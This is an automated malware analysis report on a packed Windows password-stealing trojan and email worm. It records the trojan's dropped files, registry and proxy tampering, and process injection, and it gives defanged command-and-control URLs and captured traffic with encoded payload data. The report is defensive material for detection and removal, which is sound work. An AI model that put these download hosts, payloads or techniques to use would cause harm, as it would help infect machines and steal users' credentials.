Susp_Dropper (Kaspersky), Gen:Variant.Strictor.115846 (B) (Emsisoft), Gen:Variant.Strictor.115846 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: da6afddc709bf99c8f44945efe6caf49
SHA1: 6bc754b750b8c077457f321b60694e216c534c14
SHA256: ca84817a5816452f053f16d916d545124974352dec483d2f3111d5ac085de4d9
SSDeep: 24576:ztZ CfrRGaFWn3ED YRojjzS08kTutqun8c9 1b6hL7jWOw4gyXSq1iUJL60CDq:zxcyCED7RwXisu8uUCTwiSq1560CDq
Size: 1651712 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-02-05 16:20:56
Analyzed on: Windows7 SP1 32-bit
Summary: Trojan-PSW. Trojan program intended for stealing users passwords.
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
TcService.exe:2764
The Trojan injects its code into the following process(es):
sesvcs_963_56089.exe:1956
%original file name%.exe:3308
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process TcService.exe:2764 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\23.txt (30170 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\01[1].txt (26410 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SB1GUIDO.txt (111 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\NamuADLook[1].dll (16650 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\26993501420171281319931[1].htm (29233 bytes)
C:\CF_Helper.dll (202 bytes)
%Program Files%\NamuADLook.dll (20370 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\33[1].txt (40 bytes)
The process sesvcs_963_56089.exe:1956 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\ProgramData\MD PlatForm\3073838834852099154 (15 bytes)
%Program Files%\unstall000.exe (3361 bytes)
C:\ProgramData\tmpst\shst (21 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XG142QU4.txt (114 bytes)
C:\ProgramData\MD PlatForm\2242737149763168244 (15 bytes)
C:\ProgramData\MD PlatForm\UContext (182 bytes)
C:\ProgramData\MD PlatForm\7 (1 bytes)
C:\ProgramData\MD PlatForm\5 (1 bytes)
The process %original file name%.exe:3308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\TcService.exe (1670 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\S0FG29A4.txt (89 bytes)
C:\exdui.dll (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\2672760322016102115848934[1].htm (107215 bytes)
Registry activity
The process TcService.exe:2764 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASAPI32]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3F 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process sesvcs_963_56089.exe:1956 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\QuestionASK\APP]
"AppPathName" = "%Program Files%\sesvcs_963_56089.exe"
[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASMANCS]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 40 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASAPI32]
"FileTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process %original file name%.exe:3308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASAPI32]
"EnableFileTracing" = "0"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"
[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASMANCS]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
Dropped PE files
MD5 | File path |
---|---|
15a43a47885c3eff331e97137c08343d | c:\CF_Helper.dll |
5c7c865bafa4600bf1aca0e60ed8fa5a | c:\Program Files\NamuADLook.dll |
d342bd6e4b881b21be18a02e2034b01a | c:\Program Files\sesvcs_963_56089.exe |
d342bd6e4b881b21be18a02e2034b01a | c:\Program Files\unstall000.exe |
ee904db75d49139181f892ac73859135 | c:\TcService.exe |
d342bd6e4b881b21be18a02e2034b01a | c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\01[1].txt |
5c7c865bafa4600bf1aca0e60ed8fa5a | c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\NamuADLook[1].dll |
c472335b008c5942ec8a162177058111 | c:\exdui.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
TcService.exe:2764
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Program Files%\23.txt (30170 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\01[1].txt (26410 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SB1GUIDO.txt (111 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\NamuADLook[1].dll (16650 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\26993501420171281319931[1].htm (29233 bytes)
C:\CF_Helper.dll (202 bytes)
%Program Files%\NamuADLook.dll (20370 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\33[1].txt (40 bytes)
C:\ProgramData\MD PlatForm\3073838834852099154 (15 bytes)
%Program Files%\unstall000.exe (3361 bytes)
C:\ProgramData\tmpst\shst (21 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XG142QU4.txt (114 bytes)
C:\ProgramData\MD PlatForm\2242737149763168244 (15 bytes)
C:\ProgramData\MD PlatForm\UContext (182 bytes)
C:\ProgramData\MD PlatForm\7 (1 bytes)
C:\ProgramData\MD PlatForm\5 (1 bytes)
C:\TcService.exe (1670 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\S0FG29A4.txt (89 bytes)
C:\exdui.dll (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\2672760322016102115848934[1].htm (107215 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: www.cfzhushou.com
Product Name: www.cfzhushou.com
Product Version: 2.6.0.0
Legal Copyright: Copyright (C) 2017 CF????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.6.0.0
File Description: CF????
Comments: www.cfzhushou.com
Language: Chinese (Simplified, PRC)
Company Name: www.cfzhushou.comProduct Name: www.cfzhushou.comProduct Version: 2.6.0.0Legal Copyright: Copyright (C) 2017 CF????Legal Trademarks: Original Filename: Internal Name: File Version: 2.6.0.0File Description: CF????Comments: www.cfzhushou.comLanguage: Chinese (Simplified, PRC)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
UPX0 | 4096 | 3481600 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
UPX1 | 3485696 | 1622016 | 1620992 | 5.54508 | 019f64b4e813b642777b432d389d114a |
.rsrc | 5107712 | 32768 | 29696 | 3.76085 | 57a8228ec969b9e72611e2e156647e31 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://blog.163.com/leesin_2017/blog/static/2672760322016102115848934/ | 115.238.126.133 |
hxxp://blog.163.com/blog/static/26993501420171281319931/ | 115.238.126.133 |
hxxp://cdct.zhdns.net/aload/as/33.txt | |
hxxp://xzdownad.zglhsw.com/adpub//01.txt | 104.31.197.48 |
hxxp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll | 104.31.197.48 |
hxxp://publodf.kintip.com.cn/get_apis/paths/UPath0.txt | 162.159.211.96 |
hxxp://publodf.kintip.com.cn/get_apis/paths/lists/urlv8_1.txt | 162.159.211.96 |
hxxp://publodf.kintip.com.cn/get_apis/kword/UContext1.txt | 162.159.211.96 |
hxxp://publodf.kintip.com.cn/get_apis/paths/lists/DH/DHKW.txt | 162.159.211.96 |
hxxp://publodf.kintip.com.cn/ | 162.159.211.96 |
hxxp://down.9udn.com/aload/as/33.txt | 122.228.207.207 |
hxxp://baike2016.blog.163.com/blog/static/26993501420171281319931/ | 115.238.126.133 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /aload/as/33.txt HTTP/1.1
User-Agent: MyAppByMulinB
Host: down.9udn.com
Cache-Control: no-cache
HTTP/1.0 200 OK
Content-Length: 40
Content-Type: text/plain
Last-Modified: Fri, 17 Feb 2017 05:52:26 GMT
Accept-Ranges: bytes
ETag: "1ee814e288d21:1466"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 19 Feb 2017 03:47:20 GMT
X-Cache: HIT from ctzjwzs2
Via: 1.0 ctzjwzs2 (squid)
Connection: keep-alive
hXXp://xzdownad.zglhsw.com/adpub//01.txtHTTP/1.0 200 OK..Content-Length: 40..Content-Type: text/plain..Last-Modified: Fri, 17 Feb 2017 05:52:26 GMT..Accept-Ranges: bytes..ETag: "1ee814e288d21:1466"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Sun, 19 Feb 2017 03:47:20 GMT..X-Cache: HIT from ctzjwzs2..Via: 1.0 ctzjwzs2 (squid)..Connection: keep-alive..hXXp://xzdownad.zglhsw.com/adpub//01.txt..
GET /leesin_2017/blog/static/2672760322016102115848934/ HTTP/1.1
Accept: */*
Referer: hXXp://blog.163.com/leesin_2017/blog/static/2672760322016102115848934/
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: blog.163.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 19 Feb 2017 03:41:08 GMT
Content-Type: text/html;charset=GBK
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: NTESBLOGSI=414B2F0E31035AC3EA3D8B3BF0A191E4.yqblog15-8010; Domain=.blog.163.com; Path=/
Set-Cookie: usertrack=c 5 hVipE9RwWyGzEX1iAg==; expires=Mon, 19-Feb-18 03:41:08 GMT; domain=.163.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
5a1.. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.. <html xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="zh" lang="zh">.. <head>.. <meta http-equiv="X-UA-Compatible" content="IE=7" />.. <meta http-equiv="content-type" content="text/html;charset=gbk"/>.. <meta http-equiv="content-style-type" content="text/css"/>.. <meta http-equiv="content-script-type" content="text/javascript"/>.. <meta name="version" content="neblog-1.0"/>.. <script type="text/javascript">.. .. .. document.uniqueID!=document.uniqueID&&!!location.hash&&(location.hash=location.hash); .. document.domain = location.hostname.replace(/^.*\.([\w] \.[\w] )$/,'$1');.. window.focus();.. window.getMusicTimeStamp=function(){return 'db4721d88d4cf492bc8388e52f709b99';};.. .. //BLOG-647:....OS.............................. (function(){.. window.setTimeout(function(){.. var _loginUserIcon = document.getElementById('loginUserIcon');.. var _rsavatarimg = document.getElementById('rsavatarimg');.. if(!!_loginUserIcon){.. var _loaded1 = false;.. var _img1 = new Image();.. _img1.onload = function(){.. _loaded1 = true;.. _img1.onload = null;.. };.. _img1.src = _loginUserIcon.src;.. window.setTimeout(function(){.. ..5a8.. if(!_loaded1){..
<<< skipped >>>
GET /get_apis/paths/UPath0.txt HTTP/1.1
Host: publodf.kintip.com.cn
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:41 GMT
Content-Type: text/plain
Content-Length: 708
Connection: keep-alive
Set-Cookie: __cfduid=d6eee63be45249628269d3f301d7655041487475701; expires=Mon, 19-Feb-18 03:41:41 GMT; path=/; domain=.kintip.com.cn; HttpOnly
Last-Modified: Fri, 17 Feb 2017 13:16:47 GMT
Accept-Ranges: bytes
ETag: "e491d6172089d21:812"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b45da0ec5990-VIE
0g77iaswetswCyLvkQXe1iXbBHaw5CZslWdCJXZ2JXZT9SawF0XyVmdyV2Uv02bj5SM1kmahxmLzV2ZuFWbv8iOwRHdo1DSUFEUfNUQFZVSM9lRFRkCNcr1YXb/Kjas3v741CyLvkQXe1iXbBHaw5yajlGbDJXZ2JXZT9SawF0XyVmdyV2Uv02bj5SM1kmahxmLzV2ZuFWbv8iOwRHdo1DSUFEUfRVVO90QDF0XGVERK0QQVByLvkQCJkQXe1iXbRHe05SM0hXZ052bDV1LkJ3b3t2LzlGch9Fdld2L9gEVBB1XU5URHF0UV9lRFRkCNY918zL252ru8WLIv8SCJkQCd5VLetFd4RnLXtESE9CSE9yc0NXas9ycoRXYw9ycpBXYfRXZn9SPIR0XEJ1TXt0XGVERK0w9Xnts9qLv1CyLvkQCJkQXe1iXbRHe05CVQ9ESE9CSE9yc0NXas9ycoRXYw9ycpBXYfRXZn9SPUB1TfhERfZUREpQD267tC7PvE78wWTexg8yLgACIgACIgASCJ0lXt41WdRHe05SMfhjdsJXdvMHdzlGbvMHa0FGcvMXawF2X0V2ZvsVPIRVQQ91RJZkTPN0XGVERK0gvxaOsFfrq/CyLvACIgACIgACIJkQCJACIgACIgACIg0lXt41WdlDOwYTNb11N1AzM0sVX5kjN2EzW940TJNlUFZ1XGVERK....
GET /get_apis/paths/lists/urlv8_1.txt HTTP/1.1
Host: publodf.kintip.com.cn
Cache-Control: no-cache
Cookie: __cfduid=d6eee63be45249628269d3f301d7655041487475701
HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:42 GMT
Content-Type: text/plain
Content-Length: 52692
Connection: keep-alive
Last-Modified: Sat, 18 Feb 2017 07:54:41 GMT
Accept-Ranges: bytes
ETag: "80768442bc89d21:812"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b461a15c5990-VIE
=QLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLtoQDt0SLE5URt0SLK0QXe1iXbBDMy0jQPJFUflVRO9UTP50XLNUSMN0XzAjCN0lXt41WdFmcvN3WdlmauF2Zb1Vdvd2bztVX1RWahJ2WdBHaw5ybyB3Yv02bj5SdklWYi5yd3d3WdBHaw5SdklWYi9SbvNmL1RWahJmL3d3db1VbvNmL1RWahJmLrx2Y6J2W9skUB10XT91SDlETD9lMwoQDd5VLetVXuM2Wd5CbthXdklWYitVXu4Wdb1lL6tVXuA3Wd5SZb1lLlFWbttVXuMHdhR3cb1lL3tVXuMHZhtVX1RWahJ2W9skUB10XG91SDlETD9lMwoQDd5VLetFM9I0TSB1XG1kTfN1XLNUSMN0XyAjCN0lXt41WwADO9I0TSB1XT91SDlETD9lMwoQDd5VLetFMwgTPC9kUQ9lRft0QJx0QfJDMK0QXe1iXbBDMz0jQPJFUfJVQCxETPJ1QT91UfJDMK0QXe1iXbRTPFx0QZN0XLNUSMN0XyAjCN0lXt41Wy0TRMNUWD91VPh0UfFDMK0QXe1iXb11Lt92YuEzbhJWZoNmL3d3dv8iOwRHdotVPLJVQN9FUNVlSfFDMK0QXe1iXbBDO9gVQN91VPh0UfFDMK0QXe1iXbBTM94USN91VPh0UfFDMK0QXe1iXbBTPYFUTfdUQQ9FUNVlSfFDMK0QXe1iXbBTPOlUTfdUQQ9FUNVlSfFDMK0QXe1iXbBDMx0zVPh0UfFDMK0QXe1iXbFDZh1DZhZSM98mJx0Ta/AHaw5CU4gzYyMXYyV2d5R3Lt92YuEzbhJWZoNmL3d3dv8iOwRHdo1DTSV1XwAjCN0lXt41Wx0zQQ10XZJFVTl0XwAjCN0lXt41Wx0jVMd0XFNVVTl0XwAjCN0lXt41Ww0DRM90XFNVVTl0XwAjCN0lXt41WwAjM9UkVP10XOlUTY9FMwoQDd5VLetFM50DUPJFUfVkVP1ETPRlUfBDMK0QXe1iXbBzN9I0TSB1XOlUTUJ0XwAjCN0lXt41W1ITPC9kUQ9lTJRlRFx0XwAjCN0lXt41Ww0TRQlFVft0QJx0QWB1XwAjCN0lXt41WwADM00TRH5UQS9FVJF0VfRUQPJ1XwAjCN0lXt41Ww0TRH5UQS91QN10XwAjCN0lXt41Ww0jTJ10XD1UTfBDMK0QXe1iXbJTPFdkTBJ1XEF0TS9FMwoQDd5VLetlM94USN9FRB9kUfBDMK0QXe1iXbBDMyETPDZkQfV0ROFkUfRVSBd1XwAjCN0lXt41WwAjM9MkRC9lTJ10XUlUQX9FMwoQDd5VLetFM30TRH5UQS9FVJF0VfBDMK0QXe1iXbBjN94USN9FVJF0VfBDMK0QXe1iXbFDZh1TRNFkTTNVQMN0XwAjCN0lXt41Wx0TRD5UQJxETB9VWCRVSNlETfBDMK0QXe1iXbJTPEl0XFBVWUN0XwAjCN0lXt41W00DRJ9VRD5UQJxETB9FMwoQDd5VLe
<<< skipped >>>
GET /get_apis/kword/UContext1.txt HTTP/1.1
Host: publodf.kintip.com.cn
Cache-Control: no-cache
Cookie: __cfduid=d6eee63be45249628269d3f301d7655041487475701
HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:43 GMT
Content-Type: text/plain
Content-Length: 12412
Connection: keep-alive
Last-Modified: Mon, 01 Dec 2014 19:36:36 GMT
Accept-Ranges: bytes
ETag: "b07def1e9edd01:812"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b469625b5990-VIE
BDM04iM2UDNy4yNuczLyV2c39mcCFVUgYzMuczM18SayFmZhNFI4QjLwUjNx4CMuEzMvUWbvJHaDBSKvt2YldEIltWasBCLM1EVItEKgYzMuczM18CdptkYldVZsBHcBBSKx4iNgQlTgM3dvRmbpdFKgAjL18SYsxWa69WTgoDduV2ZB1iclNXVbpQDdlCMwQjLyYTN0IjL34yNvIXZzd3byJUURByOw4iNvQnblRWayRFI7EjL2ACVOByc39GZul2VgsDMuATMgUUST1EI7UGbilGdhBXbvNGKgAjL18SYsxWa69WTgoDduV2ZB1iclNXVbpQDdZzMuczM18SayFmZhNFI3ETMuATN3EjLw4yMz8SZt9mcoNEIp82ajV2RgU2apxGIswUTUh0SoAiNz4yNzUzL0l2SiV2VlxGcwFEIpEjL2ACVOByc39GZul2VoACMuUzLhxGbpp3bNBiO05WZnFULyV2cVtlCN0lNgQGby92VlhGVgYzMuczM18SayFmZhNFIzYjLwUjNx4CMuEzMvUWbvJHaDBSKvt2YldEIltWasBCLM1EVItEKgYzMuczM18CdptkYldVZsBHcBBSK0YzVPdFI7EjL2ACVOByc39GZul2VoACMuUzLhxGbpp3bNBiO05WZnFULyV2cVtlCN0VMz4yNzUzLpJXYmF2UgQjNuATM0EjLw4iNy8SZt9mcoNEIp82ajV2RgU2apxGIswUTUh0SoASMz4yNzUzL0l2SiV2VlxGcwFEIpEjL1ACVOByc39GZul2VoACMuUzLhxGbpp3bNBiO05WZnFULyV2cVtlCN0lNz4yNzUzLpJXYmF2UgUjMx4SN4kTMuAjL2MzLl12byh2QgkybrNWZHBSZrlGbgwCTNRFSLhCI2MjL3MTNvQXaLJWZXVGbwBXQgkSMuUDIU5EIzd3bk5WaXhCIw4SNvEGbslmev1EI6QnbldWQtIXZzV1WK0QXwIjL54CMuIzLvZ3bOx2bvNEI2MjL3MTNvkmchZWYTBCMxEjLzUDNx4CMucjMvUWbvJHaDBSKvt2YldEIltWasBCLM1EVItEKgYzMuczM18CdptkYldVZsBHcBBSKx4SNgQlTgM3dvRmbpdFKgAjL18SYsxWa69WTgoDduV2ZB1iclNXVbpQDdZzMuczM18SayFmZhNFIw4SOzcjLw4SMvIXZzd3byJUVgcDMx4CMwcTMuAjLyMzLl12byh2QgkybrNWZHBSZrlGbgwCTNRFSLhCI2MjL3MTNvQXaLJWZXVGbwBXQgkSMuYDIU5EIzd3bk5WaXhCIw4SNvEGbslmev1EI6QnbldWQtIXZzV1WK0QX2MjL3MTNvkmchZWYTBSMwEjL5kTNx4CMuAzMvUWbvJHaDBCMwATMuIjLz4CNv42boRHeh1EIp82ajV2RgU2apxGIswUTUh0SoAiNz4yNzUzL0l2SiV2VlxGcwFEIpQjNX90VgsTMuYDIU5EIzd3bk5WaXhCIw4SNvEGbslmev1EI6QnbldWQtIXZzV1WK0QX2
<<< skipped >>>
GET /get_apis/paths/lists/DH/DHKW.txt HTTP/1.1
Host: publodf.kintip.com.cn
Cache-Control: no-cache
Cookie: __cfduid=d6eee63be45249628269d3f301d7655041487475701
HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:46 GMT
Content-Type: text/plain
Content-Length: 103236
Connection: keep-alive
Last-Modified: Mon, 01 Dec 2014 19:37:06 GMT
Accept-Ranges: bytes
ETag: "2d4a3309edd01:812"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b476c3f45990-VIE
oL19Kd3Ivf1HHboCzi P3qvQPb4Wr9v43LL6SdvSTct1rs1KTqx8DLLka82Rv6y9qc1Izi Jfa00Hs3WTMssUu19P70XvOwIXLLdjMwD7M07X9x9Kq8C/ML4GL6JT7zlfMw1ydunfLqNzSp yPskaM/wCdv0OssKzC2QH tOr75IvMyuWs6LDDNs0OwtS93w6O7Tft45yi61S7zJjrwwyswsA8tkSd2PDdwweML6vb6Lbsx9qspyb60pmLLner8HD71s/bvKzqx9jML6SdvSffwLjsrFndyso/uPHczLzCq327tKfb98Wr0oeNL u8q5Gusiet 5C8waTd RXP1K0ALwL8qILLsHHboCTeyieNLQPb4WXDMwIzMsoL19Kdoya6sYjLLka82Rv6yEX73PHvws46uGz7pRTfw6nLwDzS9KzLvlbd/zSLti6ML6SdvS3NyAPszQvf1G/rv4yCuxiey0 c5H7duNPNLmSrp6SctkOb/5Sqx8DLLKfb98iN0hfrz6eOys8Nsuz 0XH9xs0Ow6T7yDPNv0 